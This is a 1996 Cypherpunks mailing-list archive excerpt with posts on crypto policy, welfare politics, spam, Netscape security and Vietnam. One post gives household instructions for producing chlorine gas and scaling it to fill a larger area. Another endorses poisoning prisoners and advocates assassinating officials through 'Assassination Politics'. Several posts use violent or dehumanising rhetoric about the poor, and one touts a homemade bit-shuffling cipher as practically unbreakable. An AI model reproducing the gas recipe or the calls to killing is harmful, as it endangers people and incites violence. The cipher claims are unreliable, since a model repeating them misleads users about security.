offense involved then, going bagged in a public place? > since when do I or anyone else not have the right to wear a bag on > my head? Make-up should be outlawed! The potential for turning oneself into an anonymous creature is *way* to big for not being alarming. There ought to be a law!
And beside, although it is often used as an enhancing tool, of what use is the little and irrelevant egoist human pleasure of looking "nice" when we are viewing things from the standpoint a sensitive and poor and terrified child or frail and defenseless woman? jfa Jean-Francois Avon, Montreal QC Canada "One of theses centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold PGP key at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From shamrock at netcom.com Sun Sep 15 19:08:35 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 16 Sep 1996 10:08:35 +0800 Subject: [Noise] Shopkeepers Preventing Riot Redistribution In-Reply-To: <199609151328.JAA16180@osceola.gate.net> Message-ID: On Sun, 15 Sep 1996, Jim Ray wrote: > Indeed, it was. In a beautiful-to-me scene which Miami's WSVN, Channel 7 > (our big-hair station) called "chilling," Korean-American shopkeepers, > perched atop their building with semi-automatic firearms, kept one block > safe while the rest of the neighborhood burned without police protection. > Upon being informed that this was a biased interpretation of legitimate > actions by the merchants, which _I_ found heartwarming, they said that > chilling was "just a word." What your TV station probably didn't report was that the police quickly showed up at the scene. To arrest the looters carrying crowbars and torches? Of course not. The cops came to arrest the "sniper". --Lucky From snow at smoke.suba.com Sun Sep 15 19:23:07 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 10:23:07 +0800 Subject: That Evil Internet, Pt. XXIII In-Reply-To: <199609120410.VAA11385@web.azstarnet.com> Message-ID: On Wed, 11 Sep 1996, David M. Rose wrote: > Caught an interesting segment on this evening's PBS news program with Jim > Lehrer. > Two senators were discussing whether the U.S. should sign the international > agreement banning chemical warfare. > Sen. Kyl maintains that verification is impossible and that Iraq, Libya, and > North Korea will never participate. > Sen. Nunn responds that we should sign anyway. Besides, he adds in the non > sequitur of the week, anyone can get instructions on how to build chemical > weapons on the Internet. > I guess the Internet isn't just for pornography and conventional bomb-making > advice anymore. WARNING: DANGEROUS. Simple advice for the manufacture of Chlorine Gas (similar enough to mustard gas that it has the same effect). 1 bottle of Chlorine Bleach. 1 Bottle of lime-away. Hold Breath, mix in open container. Clear the building before you breathe again. Use more bottles for a larger area. I did this accidentally when I was young (16), foolish and working for a hospital. That it happened at work (_very_ small amounts of both bleach and lime-away) made the Emergency Room visit free and quick. No permanent damage, but I was lucky. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From dwatson at deltanet.com Sun Sep 15 19:28:11 1996 From: dwatson at deltanet.com (Dave Watson) Date: Mon, 16 Sep 1996 10:28:11 +0800 Subject: Crypto Publicity Message-ID: <199609152245.PAA24552@mail1.deltanet.com> The Orange County Register, a somewhat conservative daily for the county just south of somewhat more liberal Los Angeles, provided a short plug for crypto in today's editorial page. Not that they're necessarily any better than the others, but positive publicity should be encouraged. "The Clinton administration has been trying to control cryptography completely. It doesn't care that its export controls on cryptography put U.S. companies at a disadvantage, unable to secure properly exports of electronic information. A new group has formed to fight against this censorship: the Internet Privacy Coalition. Concerned businesses and private citizens should check out its web site at: www.privacy.org/ipc/" The register is at www.ocregister.com. From jyy at gnn.com Sun Sep 15 19:51:29 1996 From: jyy at gnn.com (John Young) Date: Mon, 16 Sep 1996 10:51:29 +0800 Subject: Pipeline Down Message-ID: <199609152328.TAA01262@mail-e2b-service.gnn.com> Pipeline appears to be down. Maybe a SYN sin, maybe just a Sunday sin. If any unanswered messages to jya at pipeline.com, try jyy at gnn.com From snow at smoke.suba.com Sun Sep 15 19:52:51 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 10:52:51 +0800 Subject: (Fnord) Edupage, 10 September 1996 In-Reply-To: <199609120436.VAA06548@mail.pacifier.com> Message-ID: On Wed, 11 Sep 1996, jim bell wrote: > And does he want to be punished, or merely stopped? Given the social scene in D.C., I'd bet he wants to be punished. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Sun Sep 15 19:58:07 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 10:58:07 +0800 Subject: Informal Renegotiation of the Law In-Reply-To: <2.2.32.19960912204730.006977ac@panix.com> Message-ID: On Thu, 12 Sep 1996, Duncan Frissell wrote: > Many people on this list and in the larger world focus on laws and > regulations and sometimes act as if that is the only way that the relative > rights and duties of governments and civilians are established. In fact, > there is a lot of informal negotiation going on all the time. This is > significant because an unenforced law isn't a law at all. Does does the phrase "Selective Enforcement" mean anything? > For example, you will not read anywhere that compulsory education laws have > been repealed -- but they have. When the home schooling movement started in > the late 1970s, there were occasional harassment and prosecution of parents. > The home schoolers won some and lost some. As time went on, the authorities > came to accept home schoolers so that at this point, legal problems are > rare. Compulsory education has been effectively repealed by the actions of > refusenicks in both the subject population and the enforcement population. Their children are still getting educated. Not thoroughly enough in some cases, but educated in the basics. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Sun Sep 15 19:58:07 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 10:58:07 +0800 Subject: common sense In-Reply-To: <323896EE.3BC3@precipice.v-site.net> Message-ID: On Thu, 12 Sep 1996, HipCrime wrote: > > And rather than "dispensing drugs in clinics," why not simply > > scrap the drug laws entirely? People have a *right* to do as > > they please with their bodies. > Let's hear it for common sense. It's the first decent posting I've > seen to this list. Then shut up and read a while. It will do you good. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From research at isr.net Sun Sep 15 20:04:45 1996 From: research at isr.net (Research Unit I) Date: Mon, 16 Sep 1996 11:04:45 +0800 Subject: ISR on the web Message-ID: <19960915235105328.AAA680@ISIS.nso.org> Internet Security Review is now available on the web. Have a look at http://www.isr.net == From snow at smoke.suba.com Sun Sep 15 20:05:36 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 11:05:36 +0800 Subject: mailing lists In-Reply-To: <3238648F.207@precipice.v-site.net> Message-ID: On Thu, 12 Sep 1996, HipCrime wrote: > Well, "doctor" why can't you see (with your logic) that junk Email (or > "spam") would save many, many forests if it REPLACED junk SnailMail. > Isn't it just that your "irrelevant feelings" have been hurt, because > someone used your remailer-baby in a way you hadn't planned for ?!? > Why not put your money where your mouth is, and bet me (any amount), > that spam WILL be socially acceptable by the year 2000. Particularly, > when the green-folks discover how many trees will be saved. It'll be > a social-mandate, NOT just a suggestion. Want to bet? I'll accept junk email when it costs more to send it than recieve it. I don't have to pay for my incoming snail mail service. Most do for email. You are speaking on my dime, and that isn't FREE SPEECH. You want to talk, you pay. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From shamrock at netcom.com Sun Sep 15 20:15:11 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 16 Sep 1996 11:15:11 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: On Sun, 15 Sep 1996, Timothy C. May wrote: > I have no problem with letting them stay in agony (but you all knew this). > > "Saving for a rainy day," whether saving, investing, getting an education > (while others are out partying), preparing, etc., all takes effort and > commitment. If those who save and prepare are then told they have to pay > high taxes to support those who partied....well, the predictable effect is > that many of them will say "I'll just party and let The System take care of > me." Thus, the effect of "not letting them stay in agony" is _more_ people > in agony. When you tell people that a compassionate society will meet their > basic needs, a predictable fraction of them will choose not to work hard > and prepare themselves. > > I say we need to let about 20 million Americans, and a couple of billion in > the rest of the world, meet their fate. > > While I will not _actively_ seek to dispose of them, I will work to make > sure they cannot continue to subsidize their lives at my expense. As usual, Tim sums it up. Or as Duncan once wrote [not an exact quote] "If aid to the poor hadn't been successful, there wouldn't be so many of them" --Lucky From attila at primenet.com Sun Sep 15 20:17:26 1996 From: attila at primenet.com (attila) Date: Mon, 16 Sep 1996 11:17:26 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <199609152344.RAA15298@InfoWest.COM> before everyone else flames tim, I'll toss a couple-three Carter dollars in the pot: 1. where has compassion, which is wrung from an unwilling minority by coercian, ever succeeded in building the economy in *real* numbers without raising taxes disproportionately for more bureaucratic waste? forget the idea that it will build a community --unless you wish to consider the Bitch's "It Takes a Global Village" a community. Statist from the cradle; welcome to "Logan's Run." 2. if there is community "welfare" by the biblical definition, is it: a) socialism, and b) does it cost the community additional taxes? NO, it does not need to be or do either, BUT, it means that everybody independently attempts to succeed and the 'community' takes care of itself --and in the standard sense, the ne'er do wells fall off the path of *their own free choice.* There will always be sickness and calamity, but that is what the community is for. BTW, it still works today; I live in one of 'em. 3. deciding on a personal level where to draw the line is not necessarily socialy irresponsible. we will always have Scrooge, and God-forbid we should lose a few bleeding- heart-with-your-money liberals for the final chestnut roast. Now, I don't intend to be Scrooge, but I'll fight for my rights to cut off at the knees the knee-jerk liberals and government slavemeisters who want to tell me that I, and 2 others are required to support 100 freeloaders. --a .357 mag shell can still be loaded for less than a dime. NEXT? attila In , on 09/15/96 at 06:47 AM, tcmay at got.net (Timothy C. May) said: = .I have no problem with letting them stay in agony (but you all knew = .this). = . that's what we all love about you, tim: your predictability. = ."Saving for a rainy day," whether saving, investing, getting an = .education (while others are out partying), preparing, etc., all = .takes effort and commitment. If those who save and prepare are then = .told they have to pay high taxes to support those who = .partied....well, the predictable effect is that many of them will = .say "I'll just party and let The System take care of me." Thus, the = .effect of "not letting them stay in agony" is _more_ people in = .agony. When you tell people that a compassionate society will meet = .their basic needs, a predictable fraction of them will choose not = .to work hard and prepare themselves. =. fourth generation of the government dole in our ghettos, or is it the fifth? = .I say we need to let about 20 million Americans, and a couple of = .billion in the rest of the world, meet their fate. you're figure is low. = .While I will not _actively_ seek to dispose of them, I will work to = .make sure they cannot continue to subsidize their lives at my = .expense. no, they'll first try to cannibalize us, then fall upon themselves and their demigod leaders. = .Crypto Anarchy means getting rid of deadwood the old-fashioned way. NEXT! = .--Tim May = .We got computers, we're tapping phone lines, I know that that ain't = .allowed. = .---------:---------:---------:---------:---------:---------:---------: = .Timothy C. May | Crypto Anarchy: encryption, digital = .money, tcmay at got.net 408-728-0152 | anonymous networks, digital = .pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, = .reputations, information markets, Higher Power: 2^1,257,787-1 | = .black markets, collapse of governments. "National borders aren't = .even speed bumps on the information superhighway." -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 15 20:18:49 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Mon, 16 Sep 1996 11:18:49 +0800 Subject: Juno Newbies are Great! Message-ID: <01I9IRO3SO9G9ULPYZ@mbcl.rutgers.edu> From: IN%"stewarts at ix.netcom.com" "Bill Stewart" 14-SEP-1996 07:37:07.81 >- it's free. Anybody can get on it. Easily. Anonymously, more or less, > since they don't need to have your whole credit history > to be able to charge you money. At most you need a maildrop. As has been previously pointed out, this also makes it nice for disposable remailer front ends. Is anyone currently working on this project? -Allen From norm at netcom.com Sun Sep 15 20:50:24 1996 From: norm at netcom.com (Norman Hardy) Date: Mon, 16 Sep 1996 11:50:24 +0800 Subject: What is best policy paper on crypto? Message-ID: At 7:18 PM 9/12/96, Gregg Cooke wrote: .... > > I'm gonna stick my neck out here and ask a naive question: where > can I find "the NAS report" mentioned in this thread? Note that > I'm new to this list (2 days) so please be kind if this paper is > extremely well known (it's not known to me but it sounds like > something I need to read). > > -Gregg I think that they meant the NRC (National Research Council) report. It is at: . From dlv at bwalk.dm.com Sun Sep 15 20:50:44 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 16 Sep 1996 11:50:44 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > Crypto Anarchy means getting rid of deadwood the old-fashioned way. Starting with the lying old fart himself. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gnu at toad.com Sun Sep 15 20:51:02 1996 From: gnu at toad.com (John Gilmore) Date: Mon, 16 Sep 1996 11:51:02 +0800 Subject: Mobile IP URL typo In-Reply-To: <199609152358.QAA19813@dfw-ix6.ix.netcom.com> Message-ID: <199609160045.RAA16241@toad.com> > >locations. See http://www.ietf.org/html-charters/mobileip-charter.html, > >or search for "Mobile IP" in a web search engine. > That URL got 404-NotFound... s/-/. http://www.ietf.org/html.charters/mobileip-charter.html John From dthorn at gte.net Sun Sep 15 20:56:57 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 16 Sep 1996 11:56:57 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <323C9BC1.2160@gte.net> Asgaard wrote: > On Fri, 13 Sep 1996, Timothy C. May wrote: > The 70% already _are_ cutting the throats of the other 30%. It's > called a 60%+ tax rate. This is the sum of: federal income tax, state > income tax, Most of these taxes are not used for feeding the poor but > to support the Nomenclatura of the Bureaucracy and we all want to get > rid of that. > > Cf. what sociologists call "the demographic transition." Countries > that value learning and wealth are _not_ facing a population problem. > In fact, many such countries are now at "below replacement" birth > levels. > And that's good. The world population really should go back to around > 1 billion for achieving a stabile ecology (with singing birds for > the peace of minds). The former (?) US system of encouraging young > standalone women to make babies to get benefits was very bad. The > Chinese system - less benefits the more children you have - is the > way to go. Just a comment: "The world population really should go back to around one billion", etc. And how could we achieve that without severe govt. oppression, one wonders? Now, I've heard of "education" being used to help the masses learn to be responsible citizens ad nauseam, but since education is pretty much just propaganda in the massively-capitalist system now taking over even the P.R. of China, how the heck is education going to work? From jya at pipeline.com Sun Sep 15 21:05:06 1996 From: jya at pipeline.com (John Young) Date: Mon, 16 Sep 1996 12:05:06 +0800 Subject: Pipeline Up Message-ID: <199609152351.XAA29294@pipe3.ny3.usa.pipeline.com> Cancel that poop about Pipeline being down. Seems only NYC is down. Access is OK through PSInet. jyy at gnn.com is for top secret black SIGINT only, okay? From dthorn at gte.net Sun Sep 15 21:05:09 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 16 Sep 1996 12:05:09 +0800 Subject: Cryptography of a sort - redux Message-ID: <323CADBE.3D54@gte.net> If anyone remembers my original postings from a couple weeks ago (my first-ever on The Net), I described a method to "shuffle" bits in a text-stream, using simple random-number generators, to insure that the text cannot be descrambled by brute-force methods. It has occurred to me only after this time that there was significant misinterpretation of what I proposed. I do not change any bits of text, I merely reposition them, therefore there is no applicability of standard analysis techniques (XOR masking, whatever) to the decoding process. The result file contains the same number of zero and one bits as it started with, through any number of encryption layers. The only way to recover the original text is to reposition the shuffled bits correctly, which requires brute-force guessing of the pseudo-random-number output. This guess is very simple for the first encoding layer, but compounds exponentially in subsequent encodings, so that after half a dozen or a dozen passes, where the executable program(s) is called from scratch for each pass, the shuffling rapidly approaches true randomness, and cannot be decrypted in practice except through the exact mirror-image reversal of the encryption passes. An example: How long would it take for you to guess the number (between 0 and 32000) I'm thinking of, if you could guess 16 billion numbers per second? Would it be .000001 second, on average? If you had to guess the ten different numbers I'm thinking of, and get all ten correct sequentially, it should take an essentially infinite amount of time, yes? And remember, since computer bits have such low differentiation (ones and zeros), looking for "patterns" and so forth just doesn't apply in this type of encryption. As to the Public Key part of the argument, once there is general understanding on the above points at large, it might then be worthwhile to discuss the advantages and disadvantages of how to make/distribute Private keys, etc. One gentleman on this forum made an argument recently, something to the effect that it wouldn't be worthwhile for Hacker X to try to break into datastream Y, assuming datastream Y is encoded with such-and-such a key, that datastream Y is sufficiently unimportant, and motive for such a breakin would not be great enough to justify the expected effort. To such arguments, all I can say is, this is the computer age, and enough mundane transactions can add up to something significant, or, one could lower the expected-effort ratio, you get the picture. From tcmay at got.net Sun Sep 15 21:06:58 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 16 Sep 1996 12:06:58 +0800 Subject: Workers Paradise. /Political rant. Message-ID: At 11:43 PM 9/15/96, attila wrote: > NO, it does not need to be or do either, BUT, it means > that everybody independently attempts to succeed and the > 'community' takes care of itself --and in the standard > sense, the ne'er do wells fall off the path of *their own > free choice.* There will always be sickness and calamity, > but that is what the community is for. > > BTW, it still works today; I live in one of 'em. And lest there be any doubt, I _do_ support certain kinds of charities, and will not of course stop anyone from practicing charity. While I have no religious beliefs to speak of, I strongly support the mechanisms some churches have for taking care of their own members, recruits from the street, etc. (Including Salvation Army and "mission" sorts of inner city things--note of course that most such entities also insist on prayer and/or Bible readings as part of the deal...I wonder how long it will be before a class action lawsuit is filed to stop the prayer part? This would effectively shut the missions down, of course.) The thing about _traditional_ charity, of the religious or community sort, was that it was not treated as an "entitlement," as something the resentful masses could "demand" as part of their "human rights." A parish priest, for example, might extend charity to a poor person, or a widow, or whatever, but not to an able-bodied person who simply decided to not work. Nor to an unmarried woman who kept getting pregnant and having more mouths to feed. (I surmise that most such women either died of diseases related to sexual promiscuity, died in childbirth, died of disease brought on by malnutrition, or ended up in convents (Catholic birth control).) The point is that even in an "age of charity," strings have to be attached by the givers of charity. People will simply not give 40-60% of what they earn to support a growing population of people who say it's their "right" to welfare, AFDC (Aid to Families with Dependent Children), WIC (Women, Infants, and Children), food stamps (*), and suchlike. (At certain supermarkets I sometimes shop in on the way back to my town, people in front of me in line put their nice cuts of meat down, their fine loaves of bread, their frozen dinner entrees, their "Ben and Jerry's Ice Cream," and then pay for it with books of blue "Department of Agriculture" food stamps. They use their own cash (perhaps gotten by cashing their welfare and "disability" checks) to buy their smokes and booze, as food stamps are not allowed to be spent on this stuff. My impression is that they eat more expensive food than I do, perhaps because they're buying the food with "play money," whereas I'm buying my food with money that's what's left after I had to pay 40-50 taxes, so I seek to economize when I can!) > Now, I don't intend to be Scrooge, but I'll fight for my > rights to cut off at the knees the knee-jerk liberals and > government slavemeisters who want to tell me that I, and > 2 others are required to support 100 freeloaders. And speaking of Scrooge, I like "A Christmas Carol" about as much as anyone I know, and try to take the lesson of what Scrooge learned as a general lesson about life and living it. (As with "Robin Hood," the message is often confused. Robin Hood was not "stealing from the rich," he was taking back what was stolen from the peasants and farmers by the King and his tax collectors, notably the Sheriff of Notingham. At least this is how I read the myth.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dthorn at gte.net Sun Sep 15 21:12:13 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 16 Sep 1996 12:12:13 +0800 Subject: MTH_ead In-Reply-To: <199609141641.QAA11110@pipe4.t2.usa.pipeline.com> Message-ID: <323C975D.156@gte.net> John Young wrote: > 9-14-96. WaPo: > "Empty-Head Network Fails to Link TWA Crash to Terrorism." > The frantic overseas intelligence-gathering effort, > which has included eavesdropping, use of informants and > offers of large cash payments for leads, has been > undertaken by the CIA, the NSA and the DEA, as well as > a number of foreign investigative agencies. The NRO has > analyzed voluminous archives of intelligence drawn from > spy satellites, intercepted phone calls and electronic > eavesdrops gathered before the crash. > Since right after the TWA crash, the NSA started > monitoring phone conversations of people believed to > have ties to terrorists groups, as well as trying to > track the movements of suspected terrorists. The CIA, > working through its sources, has been offering money for > leads on any kind of terrorist role. The DEA has been > using overseas agents to gather intelligence; the FBI > liaisons stationed in 23 countries are working to gather > intelligence on the crash; and Scotland Yard and the > Mossad are also empty-handed (not Red-handed -- yet). > http://jya.com/mthead.txt (10 kb) > MTH_ead All these multi-BILLION-dollar agencies, seeming to have no clue? Is this not a suggestion of some kind of inside job? From hallam at ai.mit.edu Sun Sep 15 21:12:22 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Mon, 16 Sep 1996 12:12:22 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: Message-ID: <9609160104.AA32697@etna.ai.mit.edu> > Work for the competition, or start your own company. Easy enough for you or me who can charge the minimum wage rate for an hour for a period more like a minute. The point is that Perry was making an appeal to "fairness" in which the cause of the unfairness is pretty much immaterial. If you believe that Digitronics has the right to behave as described then why don't they have the right to draw up lists of suspicious people. We've seen libertopia - its the world of Neuromancer or Bladerunner. When I described it "Medieval" on a talk show recently, William Gibson responded with the term "Reaganite". Being opposed to government slavery isn't enough. Coorporate slavery is just as bad. Unless people are enfranchised ecconmically as well as politically the political liberties don't matter much. I'm quite happy to allow Bill G. the run of the Internet because if he becomes too powerful and becomes a threat to society itself I don't mind the used of government power to break up a monopoly. On the other hand various people on this list get tied up in knots trying to have it both ways, to be pro-coorporatism in general but anti the kind of coorporatism that they don't like. I am on an SPL that is run by an organisation called the "Ecconomic League". It is an organisation run by the UK Conservative party which keeps lists of "unsafe" employees. Of course the list is available for government repression as well if they choose - except that few would give it any credibility. In November 55 odd percent of the population will vote for Clinton who is not an opponent of government. About 35% will vote for Dole who is even more pro-government having spent his time in the Sentate getting favours for friends like Archer-Daniels-Midland. Most of the remainder will vote for Dole appart from an insignificant number that will vote for the Libertarian and Green candidates. If you insist on such a selective interpretation of rights you will continue to be ineffective since the Libertarian party cannot get anywhere under the US electoral system and the Republican party is at present controlled by the control freaks of the Christian Coalition. If on the other hand you ditch the ecconomic rhetoric you can be very influential on the left because they are looking for ways to capture traditional republican positions. With the Republicans proposing seven consitutional ammendments in their platform that leaves open an opportunity for the Democrats to step in as the protectors of the constitution. If someone can work out a way of squaring the Freeh situation you can basically write the platform for Gore's campaign in 2000. Phill From jya at pipeline.com Sun Sep 15 21:25:58 1996 From: jya at pipeline.com (John Young) Date: Mon, 16 Sep 1996 12:25:58 +0800 Subject: The Living and the Dead Message-ID: <199609160154.BAA05664@pipe3.ny3.usa.pipeline.com> For the vets unable to sleep: The Washington Post has two heart-breaking pieces today on a new book about Vietnam, "The Living and the Dead: Robert McNamara and Five Lives," by Paul Hendrickson. The book tracks the disaster being formulated in 1965 by DC top-down policy interleaved with savagery to five grunts in bloody battle. There's a laudatory review of the grim book, and a long magazine piece gives an excerpt which includes some of Life's photos of a Marine copter gunner's transition from happy-go-lucky, to butchery of buddies, to grief-stricken collapse. It reawakens what's never forgot. That April, 1965, Life photo-essay, "One Ride With Yankee Papa 13," turned up in a sidewalk stall today so we'll put 18 photos on our Web page for a glimpse back to the future of power-mad policy begetting slaughter. http://jya.com/yp01.jpg through http://jya.com/yp18.jpg From snow at smoke.suba.com Sun Sep 15 22:59:24 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 13:59:24 +0800 Subject: who can count? In-Reply-To: <3238B18E.7211@precipice.v-site.net> Message-ID: On Thu, 12 Sep 1996, HipCrime wrote: > > No, this b.s. is more like having someone put a dead skunk in my > > mailbox, with no return address, trying to prevent me from sending > > them 100 dead skunks as a return favor. And about as welcome. > 100 dead skunks in exchange for ONE is exactly what this discussion > is all about. You CypherWIMPS just love over-kill. EmailRobot sent > ONE message to EACH address. Are you guys so unskilled in arithmetic > to understand the difference between 1 and 100? > One message is NOT spam, 100 messages to a single box IS spamming. One mesage sent to 100 addresses, unsoliciated IS spam. One message sent to One address isn't. It IS still junk mail. Overkill is a time honored concept for making sure the job is done. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Sun Sep 15 23:01:02 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 14:01:02 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <84279182110737@cs26.cs.auckland.ac.nz> Message-ID: On Mon, 16 Sep 1996 pgut001 at cs.auckland.ac.nz wrote: > >`any publicity is good publicity' syndrome. There was a *lot* of publicity, > >and Netscapes response in fixing the problem was good. Several US cypherpunks > >were tracking the stocks at the time, and could probably verify this. > Interesting... does anyone want to comment on this? This kind of damages one > of my assumptions in the paper that publicity attacks can hurt a company > providing poor security. Could it be that at the time people would buy > Netscape stock no matter what happened? If MSIE had been widespread at the > time, would it have caused people to jump ship en masse? I think one issue that may come into this is that while the kind of peopl who read this list worry about security issuse like the above, the average, or rather most (I'd off-the-cuff estimate almost all) of the users of netscape don't use the security features, and don't understand them. If they know what they are doing, they expect that at some point in the future NEED the security, but don't use/need it now. What publicity Netscape recieved was probably very minor in the mainstream media, and Netscapes damage control was most likely quite effective. I spend very little time with the mainstream media, I really don't know. I could be very very wrong about most or all of this, but I think that people on this list would tend to be just a little bit more concerned and knowlegable about security and privacy issues, and hence a little more judemental (in a good way) on those issues. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Sun Sep 15 23:07:16 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 14:07:16 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <3238B073.2847@ai.mit.edu> Message-ID: On Thu, 12 Sep 1996, Hallam-Baker wrote: > Timothy C. May wrote: > > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming > > in this morning. I'm sure you're busy, so I'll make this as short as > > possible. OK with you?" > > Joseph Shlubsky, Programmer: "Uh, sure." > Yeah, thats why we Europeans have labour laws that prevent > Digitaltronics > from doing any such thing without getting sued from here to eternity. > Pity you guys missed out on the idea of trades unions and think that > employment is some kind of serfdom in which you loose all your rights > the > day you sign up. If you hadn't sold your government to the cooprorations > a while back you might have got out of the middle ages. > I suspect that even under the weak as dishwater employment laws that > you have in the US would provide ample opportunity to file a > countersuit. Right now. But consider: If Joe _worked_ for the federal government in *certain* areas, or a government contractor in *certain* areas, this could happen. > When that type of thing happens, they don't give the reason, they do > it behind closed doors. How do you fight that? Work for the competition, or start your own company. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Sun Sep 15 23:28:46 1996 From: snow at smoke.suba.com (snow) Date: Mon, 16 Sep 1996 14:28:46 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <3238BD18.64F8@precipice.v-site.net> Message-ID: On Thu, 12 Sep 1996, HipCrime wrote: > > I'd view "comment" as expressing an opinion. If I put an "email to:" > > tag on a web site, I'm inviting "comment" on the information I've > > placed in public view > A message sent to a MAILTO button on a WebPage, which contains the URL > of another WebPage is EXACTLY on-topic. It's my belief that any active > "webmistress" would be interested in what other sites have to offer. Then register with the Search Engines and Indexers. That is where people go when they are looking for information. Don't go putting shit in my mail box. Very few people who are looking for information (other that "web sufers" will automatically fire up netscape and take a look at any URL that wanders down the road. If you put up a site that is for the web potato crowd, then I doubt you have anything I want to look at. Of course from what you spout, I seriously doubt that you have anything I want to read anyway. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jimbell at pacifier.com Sun Sep 15 23:37:01 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 16 Sep 1996 14:37:01 +0800 Subject: The Living and the Dead Message-ID: <199609160416.VAA08027@mail.pacifier.com> At 01:54 AM 9/16/96 GMT, John Young wrote: > The Washington Post has two heart-breaking pieces today > on a new book about Vietnam, "The Living and the Dead: > Robert McNamara and Five Lives," by Paul Hendrickson. > > The book tracks the disaster being formulated in 1965 by > DC top-down policy interleaved with savagery to five > grunts in bloody battle. > > There's a laudatory review of the grim book, and a long > magazine piece gives an excerpt which includes some of > Life's photos of a Marine copter gunner's transition from > happy-go-lucky, to butchery of buddies, to grief-stricken > collapse. It reawakens what's never forgot. > > That April, 1965, Life photo-essay, "One Ride With Yankee > Papa 13," turned up in a sidewalk stall today so we'll > put 18 photos on our Web page for a glimpse back to the > future of power-mad policy begetting slaughter. ObAP comment: A few weeks ago, the tv show "60 Minutes" ran an item about a group of Jews who, after the end of WWII, vowed revenge on the Nazis, down to German soldiers, plotting to kill as many as they could. In their biggest coup, they killed hundreds of Germans in a POW camp by poisoning their bread. My reaction? As you might expect, I think that the main thing they did wrong was to not kill enough of them, but more particularly to not target the higher-ups. The way I see it, the fundamental reason that people will continue to participate in holocausts, even today, is that they see no real prospect of being punished for their crimes. Unfortunately, society has been conditioned if not to "forgive and forget," at least to not punish where it has an opportunity to punish. I suggest that this is no accident: It is in the interest of tyrants everywhere to let the other guy off easy, lest he be in the same position someday. This is why numerous African and South American dictators were allowed to "retire" in peace, rather than being killed. How would an AP-type system treat Robert McNamara? He'd be dead in a second. To those who say, "What good would this do?" I respond: Anyone in the American government today who is considering an adventure which MIGHT turn into another Vietnam should be deterred by the knowledge that sometime, in 30 minutes or 30 years, he could be killed for what he did. Robert McNamara, presumably, did what he did because he thought he'd never be punished. The best way to deter future governmental abuse is to remind these people that they _will_ be punished. Jim Bell jimbell at pacifier.com From jya at pipeline.com Sun Sep 15 23:41:01 1996 From: jya at pipeline.com (John Young) Date: Mon, 16 Sep 1996 14:41:01 +0800 Subject: The Living and the Dead Message-ID: <199609160408.EAA12805@pipe3.ny3.usa.pipeline.com> On Sep 16, 1996 01:54:40, 'jya at pipeline.com (John Young)' wrote: >18 Nam photos on our Web page for a glimpse back to the >future of power-mad policy begetting slaughter. Corrected URL's: http://pwp.usa.pipeline.com/~jya/yp01.jpg through http://pwp.usa.pipeline.com/~jya/yp18.jpg From jamesd at echeque.com Sun Sep 15 23:53:33 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 16 Sep 1996 14:53:33 +0800 Subject: Kiddie porn on the Internet Message-ID: <199609160429.VAA19187@dns2.noc.best.net> [Allegations that "save the children" is a political organization providing cover for an effort to ban cryptography] At 01:54 PM 9/9/96 -0400, Hallam-Baker wrote: > Their main mission is sending food to Ethiopia and other famine > areas, development work etc. It is ultra-worthy stuff. Not everyone who sends food to the starving children is ultra respectable. Problem is that the usual cause of starving children is tyranny. In order to get close enough to the starving children to take those cute fund raising photographs you have to pay off and get cosy with tyrants. This creates a moral hazard, in that it is hard to tell the difference between normal bribery needed to 